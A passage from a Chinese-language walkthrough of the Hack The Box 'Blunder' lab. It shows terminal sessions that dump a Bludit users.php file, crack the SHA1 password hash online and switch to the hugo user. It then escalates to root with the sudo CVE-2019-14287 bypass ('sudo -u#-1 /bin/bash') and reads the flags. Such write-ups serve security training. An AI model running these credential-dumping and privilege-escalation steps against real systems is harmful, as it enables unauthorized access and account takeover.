        "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    }
}

21、这里是使用的演示报告中推荐的 https://crackstation.net/ 地址进行破解的。

22、但是在对网站服务器的根目录进行信息枚举时,发现了另一个 bludit-3.10.0a 版本的网站源码目录,并在这个里面发现了 Hugo 用户的密码 hash 值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cd ../../
cd ../../
www-data@blunder:/var/www/bludit-3.9.2$ cd ../
cd ../
www-data@blunder:/var/www$ ls
ls
bludit-3.10.0a
bludit-3.9.2
html
www-data@blunder:/var/www$ cd bludit-3.10.0a
cd bludit-3.10.0a
www-data@blunder:/var/www/bludit-3.10.0a$ ls
ls
LICENSE
README.md
bl-content
bl-kernel
bl-languages
bl-plugins
bl-themes
index.php
install.php
www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
cd bl-content
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
ls
databases
pages
tmp
uploads
workspaces
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
cd databases
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
ls
categories.php
pages.php
plugins
security.php
site.php
syslog.php
tags.php
users.php
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$

23、 使用 https://crackstation.net/ 网站也成功的破解出了密码信息:hugo:Password120

1
2
Hash	Type	Result
faca404fd5c0a31cf1897b823c695c85cffeb98d	sha1	Password120

24、这里在初始环境下使用su切换的方法,进入到 hugo 用户环境下,并拿到了第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cd /home
cd /home
www-data@blunder:/home$ ls  
ls
hugo
shaun
www-data@blunder:/home$ cd hugo
cd hugo
www-data@blunder:/home/hugo$ su hugo
su hugo
Password: Password120
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
user.txt
Videos
cat user.txt
797b675b4fea870474989fadabb48ddc

0x02 系统权限获取

25、通过查看 sudo -l 发现了,我们发现无法使用 root 的 bash 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
python3 -c 'import pty;pty.spawn("/bin/bash")'
hugo@blunder:~$ 

hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:~$

26、到这里其实考察的是sudo自身版本的漏洞,查看下版本信息

1
2
3
4
5
6
hugo@blunder:~$ sudo -V
sudo -V
Sudo version 1.8.25p1
Configure options: 
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46

27、通过演示报告,我们知道了一些当前版本的信息及描述

当知道 sudo 版本后,还发现一个 CVE-2019-14287 编号。 这个漏洞使用户可以绕过sudo安全性并提升其权限,允许sudo用户以root用户身份运行命令,即使配置明确禁止这样做。当存在这种 ALL=(ALL, !root) 形式的配置时,表示对被切换到的用户进行了 ALL(所有用户) 和其他用户的剔除操作。

该漏洞在小于 1.8.28 版本的 sudo 中存在。

sudo 1.8.27 - Security Bypass : https://www.exploit-db.com/exploits/47502

sudo -u#-1 /bin/bash

当我们sudo这样做时,它不会检查用户是否存在,因此它倾向于使用指定的参数作为用户本身来执行它。现在,-u 用于定义用户本身,#-1 将返回 0,即 root 本身的默认值。

参考:https://juejin.cn/post/6844903967990775821

https://www.exploit-db.com/exploits/47502?source=post_page-----e39b2cfda153--------------------------------

28、我们参照上面演示报告的方式,成功的获取到了最终root权限的flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
hugo@blunder:~$ sudo -u#-1 /bin/bash
id

id
pwd
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# 
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# pwd
/home/hugo
root@blunder:/home/hugo# ls
ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt
root@blunder:/home/hugo# cd /root/    
cd /root/
root@blunder:/root# cat root.txt
cat root.txt
83e1c4d114b7c7f6bbc91a17605270cf
root@blunder:/root#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/254

打靶记
#shooting-range
Blunder-htb-writeup
https://sh1yan.top/2023/12/18/Blunder-htb-writeup/
作者
shiyan
发布于
2023年12月18日
许可协议